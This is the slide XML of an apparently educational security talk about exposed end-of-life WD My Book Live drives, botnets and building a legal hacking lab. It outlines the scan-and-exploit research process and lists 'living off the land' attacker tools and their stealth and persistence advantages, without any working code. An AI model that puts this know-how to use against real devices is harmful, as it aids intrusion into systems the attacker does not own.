              <a:t>This issue is bad enough for the vendor to EOL these, abandon the firmware, state these should be removed immediately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In 2025, they’re still *everywhere*.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E391F1B0-37C9-C003-9E59-84AB8D93BD90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="4979194"/>
            <a:ext cx="7512712" cy="1500622"/>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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="172907" y="1374841"/>
            <a:ext cx="8218788" cy="4352993"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641103" y="399976"/>
            <a:ext cx="10969994" cy="818814"/>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How many are *really* out there? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Rectangle 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8294324" y="2211762"/>
            <a:ext cx="3592808" cy="2454590"/>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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1693" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Mono;Courier New;DejaVu Sans Mono"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>DNS Domain: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1693" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Mono;Courier New;DejaVu Sans Mono"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>mybooklive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1693" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Mono;Courier New;DejaVu Sans Mono"/>
              <a:ea typeface="DejaVu Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1693" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Mono;Courier New;DejaVu Sans Mono"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1693" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1693" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Mono;Courier New;DejaVu Sans Mono"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>2403 Registered around the world via SHODAN.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1693" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Mono;Courier New;DejaVu Sans Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1693" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Mono;Courier New;DejaVu Sans Mono"/>
              </a:rPr>
              <a:t>Further research indicated this number is likely a small percentage of actual attack surface.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1693" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Mono;Courier New;DejaVu Sans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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609755" y="1433728"/>
            <a:ext cx="6605433" cy="5159953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="522461" indent="-391846">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Identified and obtained a target (WD HD) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522461" indent="-391846">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Obtained access and data: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3386" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>We read the Manual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522461" indent="-391846">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Performed a Vulnerability scan identifying exploitable vulnerabilities: Targeting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522461" indent="-391846">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3870" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Researched the open findings and identified proof of concept attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="130615">
              <a:spcBef>
                <a:spcPts val="1714"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3870" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653143" y="435460"/>
            <a:ext cx="10926606" cy="818814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5321" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Review Skills / Ideas so far…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C725DD33-7108-B57E-A62A-867672C06E30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7548134" y="1433728"/>
            <a:ext cx="4146184" cy="4146184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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5748-5DBD-E5E7-AC9E-41793207E28F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hard Drives, Botnets, and how to legally build your own lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7B4060D-CA05-A387-CDF2-BCFE44BE485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0821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941F-8D38-539F-E4D1-B075885715DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How do you legally build your skills and tools?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>Don’t commit crimes, don’t be unethical… ever. Period. End of discussion. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77DE9DA7-5D6A-7EFB-9E94-C869FF099088}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>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E51A3291-2B85-5501-718C-CFA8DEEA64F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Do not practice anything this is of no use”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of paying for expensive lab equipment, implants, courses, software… why not just Live off the Land to start?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Having to create and devise your own tools and techniques makes you appreciate the craft and makes you an infinitely better hacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You never have depend on a tool or a “thing” or the ones you do never go away.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LEARN THE OSI MODEL &amp; TCP/IP STACK. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is how we got our start. These are great rules for learning the craft of hacking &amp; Living off the Land.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Dokkodo Fit Edition 1: The 21 Precepts of Dokkodo and what it means in  MODERN TIMES. | DOKKODO FIT">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3D9F798-22C1-D71E-8E24-9DE5F6B75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1481"/>
            <a:ext cx="470535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009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A191-BB72-B98D-B251-8CCB689F864A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Living off the Land – Minimal Tools, Maximum Creativity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA9AE55E-C629-310F-7495-1B91A9F9EF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="6802925" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the tools / services / physical implants you are able to source… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“What’s around you?”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud Devices and IoT are usually just embedded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>clients / reverse tunnels / backdoor local recovery.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Most commercial implants are usually just embedded clients / reverse tunnels / backdoor local recovery.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doing this yourself and learning the “how” and “why” is what makes you *elite*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>not difficult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660292F2-6237-D7E1-DEE9-70B857F5651C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7641125" y="1825625"/>
            <a:ext cx="4422053" cy="3462744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1004700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1E8A-C969-D340-D12E-2C425A68EE1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Living off the Land</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CA0DD95-D918-A97F-CDB1-CFFF2136A6F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"Living off the land" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LotL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers use legitimate tools and features already present on a target system to carry out malicious activities, rather than deploying custom malware or hacking tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Using Built-in Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Attackers leverage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>native operating system utilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerShell (Windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Management Instrumentation (WMI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command prompt utilities (cmd.exe)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Bash and system utilities (Linux/Unix)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Administrative tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PsExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, or scheduled tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Advantages for Attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Stealth: Harder to detect since these are legitimate tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bypass Security: Less likely to trigger antivirus alerts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>No Malware Needed: No need to upload suspicious files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistence: Can maintain access using legitimate system features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D9A10A0-FEC3-C975-D6CC-F7DCB2FD63D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Common IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>LotL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Built-in Linux Utilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Most IoT devices run stripped-down Linux versions with basic tools that attackers exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>BusyBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: A single binary containing many Unix utilities (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, telnet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Shell scripts</a:t>
